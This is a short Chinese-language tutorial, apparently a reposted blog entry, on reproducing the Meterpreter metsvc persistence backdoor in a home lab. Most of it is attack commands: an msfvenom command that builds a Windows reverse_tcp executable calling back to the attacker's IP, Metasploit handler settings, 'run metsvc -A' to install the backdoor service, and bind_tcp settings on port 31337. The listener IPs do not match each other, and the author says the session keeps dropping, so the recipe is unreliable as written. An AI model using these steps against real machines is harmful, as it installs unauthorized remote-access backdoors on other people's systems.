meterpreter后門-Metsvc的復現


一、msf生成后門並獲得會話

攻擊機ip:192.168.3.147 靶機ip:192.168.3.142

先生成一個exe的運行程序,並上傳至靶機運行,然后用kali監聽

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.47 LPORT=4444 -f exe -o /root/桌面/payload2.exe

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.100.130
set LPORT 4444
run

二、執行命令植入后門

在kali獲得的會話中運行 run metsvc -A,完成后門植入

去靶機下查看目標文件夾發現上傳成功

新建一個msf窗口,並依次運行命令

use exploit/multi/handler 
set payload windows/metsvc_bind_tcp 
set RHOST 192.168.3.142
set LPORT 31337

這里一直會話每次剛創建成功就會斷開,查閱文章也沒找到解決方法,各位大佬如果找到解決方法可以給小弟教學一波


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM